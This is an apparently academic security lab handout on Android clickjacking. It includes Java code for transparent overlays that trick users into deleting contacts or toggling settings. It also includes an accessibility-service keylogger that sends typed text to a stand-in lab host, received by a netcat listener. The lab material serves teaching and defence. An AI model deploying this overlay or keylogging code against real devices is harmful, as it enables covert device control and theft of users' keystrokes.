.. container:: center

   Clickjacking Attack Lab

***********************
Clickjacking Attack Lab
***********************

Overview
========

Clickjacking attack is a very common type of attack for most devices. In
such an attack, attacker uses multiple transparent or opaque layers to
trick a user into clicking on a button or link on another page when they
were intending to click on the top level page. Users can be easily
fooled, and do not even realise where they are really clicking.
Attackers need user interaction to make this attack successful, hence
they usually design clickjacking attack applications in the form of
games or survery forms.

The learning objective of this lab is for students to gain a first-hand
experience in Clickjacking attack, so they can better understand this
particular risk associated with Android systems, and be more cautious
when downloading apps to their devices, especially from those untrusted
third-party markets. In this lab, students will be asked to conduct a
simple clickjacking attack and demonstrate it on our provided Android
VM. Students will also see what damage can be done with a fully
weaponized clickjacking attack.

Students should be warned not to submit the clickjacking attack apps to
any market, or they will face legal consequence. Nor should they run the
attack on their own Android devices, as that may cause real damages.

In order to conduct this attack, the attackers need only one permission,
the "Permit drawing over other apps" permission. Once they have this, it
is very difficult for users to catch the attack. Also, this permission
is very commonly used in devices. Popular applications like the Music
application, calling application, all use this permissions. Be very
careful when giving an application this permission.

.. note:: All devices are vulnerable to this attack. Attacks on devices with Android version below 7.0 do not even require users permission to draw over other applications.

Lab Environment
===============

The lab requires two virtual machines, one is called SEEDAndroid, and
the other is called SEEDUbuntu16.04. As the name indicates, the first VM
is a virtual machine running Android operating system, and we need it to
test our clickjacking attack. The second VM is a Ubuntu Linux virtual
machine; all the tools needed for this lab, have already been installed
the SEEDUbuntu VM. Both VMs and their user manuals can be downloaded
from the SEED web site.


Task 1: Perform a Clickjacking attack
=====================================

In this task we will demonstrate a clickjacking attack, where we will
delete a contact. We have already designed an application which does a
clickjacking attack and it is installed in your AndroidVM. Our
application behaves as a Calibration phase before playing a game, it
will ask you to click various button in order to complete the
calibration for best user experience. What is actually happenning in the
background is that we are deleting a contact. In order to perform this
attack, we need to get the users permission for "Permit drawing over
other apps".

Attack Code
^^^^^^^^^^^

| Before performing the attack, we will first talk about how we did this
  attack.
| After getting the required permissions, we need to design views and
  overlay them on the page. We have to make sure to cover the whole page
  and make it possible to click through these views. So, when the user
  clicks, the click is actually happenning in the background of that
  view (which is not visible to the user). We control how wide or long
  the views are using coordinate values and have to position them
  perfectly.

#. Step 1: We use an intent to open the page which closest to our goal,
   programitically. For example, to delete contacts we will open the
   contacts application first and then design our views.

   ::

      startStep1();
      Intent openContacts = new Intent(Intent.ACTION_DEFAULT,  ContactsContract.Contacts.CONTENT_URI);
      openContacts.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
      openContacts.addFlags(Intent.FLAG_ACTIVITY_NO_HISTORY);
      openContacts.addFlags(Intent.FLAG_ACTIVITY_NO_ANIMATION);
      openContacts.addFlags(Intent.FLAG_ACTIVITY_EXCLUDE_FROM_RECENTS);
      startActivity(openContacts);

   Here, the function **startStep1()** overlays our views for the first
   page. After, this create an intent which opens the contacts
   application in the background. So, the views defined by
   **startStep1()** are on top of the first page of the contacts
   applications. Consecutively, **startStep1()** will call
   **startStep2()**, **startStep3()** and so on, until we have performed
   the required tasks.

#. Step 2: The main work now is to design the views. While designing
   views we need to place the button exactly on top of where we want the
   user to click and cover the rest of the page with whitespace. This
   makes sure that the page in the background is not visible. We use
   Android WindowManager to add our views.

   Each view has a boolean value called "passthrough". If this value is
   false, the users click will not go through to the background and vice
   versa. Only the view with our button has "passthrough" as true and
   the others have false, so that users donâ€™t click somewhere else.

   Defining our views:

   ::

      public OverlayOne(final ClickJacking service) {

              mTextView = new TextView(service);
              mTextView.setText("Calibration : ");
              mTextView.setBackgroundColor(ClickJacking.mMakeAttackVisible ? 0x66FF0000 : 0xFFFFFFFF);
              mTextView.setTextColor(0xff000000);
              mTextView.setTextSize(20f);
              mTextView.setGravity(Gravity.CENTER);
          }
      ...
      public View getView() {
              return mTextView;
          }
      ...
      public WindowManager.LayoutParams getParams() {
              return ClickJacking.getParams(mRect, false);
          }

   Here, we first define our textview.

   Here, function call **ClickJacking.mMakeAttackVisible** checks if the
   user has selected this option. If it is selected, the color schemes
   are changed and the overlays become visible to the users along with
   the background. We use this to show users the actual overlay and for
   debugging the views.

   Also, the function call **ClickJacking.getParams** return the
   coordinate values and the boolean "passthrough" value for this view.
   Each view has preset coordinates which are set using "mRect".

   Refer to **Figure 1** and **Figure 2** to see the views with "Attack
   visible" toggled on and off.

   .. figure:: media/click_jacking/Figure2.png
      :alt: alternate text
      :figclass: align-center

      Figure 1: Attack visible toggled on

   .. figure:: media/click_jacking/Figure3.png
      :alt: alternate text
      :figclass: align-center

      Figure 2: Attack visible toggled off

#. Step 3: This is the step where we add our views. This is how our
   function **startStep1()** looks like:

   ::

       public void startStep1() {
              if (currentStep > 0) return;
              currentStep = 1;
              addView(o1);
              addView(o2);
              addView(o3);
          }

   Here we add all our views. Each view checks if all views are added
   and then invokes startStep2() and so on. startStep2() will add its
   new views and remove the old ones. This is how startStep2() looks:

   ::

        public void startStep2() {
              if (currentStep > 1) return;
              currentStep = 2;
              addView(o5);
              addView(o6);
              new ViewRemover(this, o1).start();
              new ViewRemover(this, o2).start();
              new ViewRemover(this, o3).start();
          }

   **addView** and **viewRemover** are functions defined by us, which
   use Android WindowManager to set and remove views.

#. Step 4: addView() and viewRemover(): **addView() :**

   ::

       public void addView(ViewWithParams v) {
              WindowManager wm = (WindowManager) getSystemService(WINDOW_SERVICE);
              wm.addView(v.getView(), v.getParams());
          }

   Here, we create a WindowManager object and call our functions
   getView() and getParams() to add the view.

   getView() returns the view we defined in Step 2.

   getParams() checks if the view is passthrough or not, and then sets
   the layoutParams :

   ::

        private static WindowManager.LayoutParams getAlertLP(Rect rect) {
              WindowManager.LayoutParams lParams = new WindowManager.LayoutParams(
                      rect.right - rect.left,
                      rect.bottom - rect.top,
                      WindowManager.LayoutParams.TYPE_SYSTEM_ALERT,
                      WindowManager.LayoutParams.FLAG_WATCH_OUTSIDE_TOUCH |
                              WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE |
                              WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
                      PixelFormat.TRANSLUCENT);
              lParams.gravity = Gravity.TOP | Gravity.LEFT;
              lParams.x = rect.left;
              lParams.y = rect.top;
              return lParams;
          }

      NOTE :  "WindowManager.LayoutParams.FLAG_WATCH_OUTSIDE_TOUCH"  is what allows us to click through the view. Incase, "passthrough" is false, we remove this attribute.

   **viewRemover() :**

   ::

       public static void removeView(Context ctx, View view) {
              WindowManager wm = (WindowManager) ctx.getSystemService(ctx.WINDOW_SERVICE);
              wm.removeView(view);
          }

Performing the Attack:
^^^^^^^^^^^^^^^^^^^^^^

Now we can perform the attack. This involves, two steps. Refer to figure
3 to see how the application looks:

#. Step 1: Add a contact. We will delete this contact using the
   clickjacking attack.

#. Step 2: Run the clickjacking application. Click on "ASK FOR
   PERMISSION" and it will take you to the permission page. Give that
   permission. Now, head back to the app and click on "START
   CLICKJACKING ATTACK". Follow the steps and at the end you should see
   that the contact has been deleted.

#. Additional: Now try to run the attack after toggling "Make attack
   visible" option. You should be able to see how the views have been
   overlayed on top of the contacts and get an idea of how the attack
   really works (make sure to add a new contact before trying again).

.. container:: center

   .. figure:: media/click_jacking/Figure1.png
      :alt: alternate text
      :figclass: align-center

      Figure 3: Clickjacking Attack Application

Submit screenshots to prove you have done the attack.

Task 2: Dangerous Accessibility Service in Android
==================================================

One of the most dangerous services in the Android system is the
accessibility service. If any application were to get access to the
accessibility service, they would have full access to everything that
happens on the device. That application will be able to capture
keystrokes, actions, record each click or touch etc.

In this task, we show you how dangerous an accessibility service
permission can be and how the attackers can use the attack in task 1 to
get the permissions for this service and gain full control.

.. _attack-code-1:

Attack Code
^^^^^^^^^^^

Before performing the attack, we will first talk about how a legitimate
application can use the accessibility service and how we use it in a
malicious way.

**Capturing events from accessibility service :** After getting required
permissions, we need to create a class which extends
"AccessibilityService". we can use an object of "AccessibilityEvent" to
capture various different events and do with them as we please:

::

   public class getAccessibilityEvent extends AccessibilityService {
   ...
   public void onAccessibilityEvent(AccessibilityEvent event) {
        Log.d("Event 1",event.getPackageName());
        Log.d("Event 2",event.getText());
        Log.d("Event 3",event.getPackageName());
        Log.d("Event 4",event.getEventTime());
   ...
           }
   }

**Malicious usage of the Accessibility service :** One example of
malicious usage could be to send out everything typed by the user to our
server. In our application, we use a stringbuilder to concatenate
everything typed by the user and repeatedly send this out to our server
:

::

   public class getAccessibilityEvent extends AccessibilityService {
   ...
   private String getEventText(AccessibilityEvent event) {
               StringBuilder sb = new StringBuilder();
               for (CharSequence s : event.getText()) {
                   sb.append(s);
               }
               return sb.toString();
           }
   ...
    public void onAccessibilityEvent(AccessibilityEvent event) {
               s = "package=" + event.getPackageName() + "&" + "text=" + getEventText(event);
               new SendData(s).execute();
           }
   ...
   }

**SendData** is a class which extends AsyncTask used to send data out of
the device.

::

   class SendData extends AsyncTask<String, Void, Void> {
       String s;
       public SendData(String a)
       {
           s=a;
       }
       private Exception exception;
       protected Void doInBackground(String... urls) {
               URL url = null;
               url = new URL("http://www.SeedLabClickjacking.com:7777");
               HttpURLConnection urlConnection = null;
               urlConnection = (HttpURLConnection) url.openConnection();
               urlConnection.setDoOutput(true);
               urlConnection.setChunkedStreamingMode(0);
               OutputStream out = new BufferedOutputStream(urlConnection.getOutputStream());
               out.write(s.getBytes());
               out.flush();
               urlConnection.disconnect();
          }
           return null;
       }

.. _performing-the-attack-1:

Performing the Attack: 
^^^^^^^^^^^^^^^^^^^^^^

Follow the steps below to perform the attack. We will need both the VMâ€™s
for this task.

#. Step 1: On your SEEDUbuntu machine, open a terminal and run the
   following command:

   ::

      $ nc -kl 7777 

#. Step 2: On yourAndroidVM machine, you need to modify the
   /system/etc/hosts file and modify the IP address of
   "SeedLabsClickjacking.com" with the IP address of your SEEDUbuntu VM.
   In order to do this, we will use "adb push" and "adb pull". On your
   SEEDUbuntu machine, do the following:

   ::

      $ adb root
      $ adb disconnect
      $ adb connect IP-OF-ANDROIDVM
      $ adb pull /system/etc/hosts
      $ vim hosts
      $ adb push hosts /system/etc/

#. Step 3: Give accessibility permissions to our applications. For this:

   ::

      Go into settings -> Accessibility -> ClickJacking Attack -> Toggle on -> OK

#. Step 4: Play around in your AndroidVM and watch the SEEDUbuntu netcat
   session recieve everything you do. Try to type in the browser of the
   Android VM and you will be able to see each key being logged in our
   SEEDUbuntu machine.

Refer to **Figure 4** to see how a keylog response looks like on our
SEEDUbuntu machine.

Everything we do in step 3 of this attack can be done using clickjacking
attack. If attackers were to get your accessibility permission on their
application, all your information could be leaked.

.. container:: center

   .. figure:: media/click_jacking/Figure4.png
      :alt: alternate text
      :figclass: align-center

      Figure 4: Keylog Response on SEEDUbuntu

Task 3: Design your clickjacking attack
=======================================

In this task, we will perform a clickjacking attack to turn the airplane
mode off. We will give you the source code and you will have to allign
the views by modifying the coordinates in the "setCoords" function
inside the init() function of the ClickJacking class. Here is how
setCoords looks :

::

   ...
   setCoords(1, 0, 0, 1024, 100);
   setCoords(2, -100, 100, 1024, 300);
   setCoords(3, 0, 400, 1024, 820);
   ...

The first attribute is the "viewId" which tells us the ID of the view we
are modifying the coordinates for. In your activity, you have two views,
OverlayOne() and OverlayTwo(). You just have to play with the
coordinates of these views and align them perfectly. Debugging can be
done using "Make Attack visible" option. Here is a little more
information about setCoords:

**Function setCoords(viewId, ax, ay, bx, by);** Here, ax and ay define
the position of the content inside your view. Example, a button or a
textbox.

Bx and by define the length and breadth of the view itself.

For instance, in your task you will have to play with all 4 values with
OverlayOne(), but only with bx and by for OverlayTwo() (since
OverlayOne() contains the button).

You will have to modify the code, recompile and "adb install" the
application in the AndroidVM to test your changes. The only place you
have to modify is "setCoords" values inside the "ClickJacking.java"
file. Follow the guidelines given below to modify, recompile and install
your applications (you will neeed both your VMâ€™s for this task) :

-  Step 1 : Download and unzip ClickJacking.zip file from our website

-  Step 2: Locate the code files. Go to the folder
   app/src/main/java/seedlabs/clickjacking2 folder.

-  Step 3: Here you should see ClickJacking.java. This is where you have
   to modify the coordinate values for our views.

-  Step 4: After making the required modifications, build the
   application and get the .apk file. To build your app go into the root
   folder of the application and run :

   ::

      $ chmod +x gradlew
      $ ./gradlew
      $ ./gradlew assembleDebug

   You can find the built .apk file in app/build/outputs/apk/

-  Step 5: Install the apk on the Android VM using :

   ::

      $ adb disconnect
      $ adb connect IP-OF-ANDROIDVM
      $ adb install YOUR-APK.apk

-  Step 6: After installation, you should find an application with the
   name "Clickjacking Attack 2"

**NOTE:**

-  1 : You should first install the application on the AndroidVM without
   changes to get a feel of the views

-  2: You have to delete the application from the AndroidVM before
   re-installing, everytime.

-  3: You will probably have to modify, recompile and re-install
   multiple times before you can allign the views perfectly

Submission and Demonstration
============================

You need to submit a detailed lab report to describe what you have done
and what you have observed, including screenshots and code snippets (if
needed). You also need to provide explanation to the observations that
are interesting or surprising. You are encouraged to pursue further
investigation, beyond what is required by the lab description.
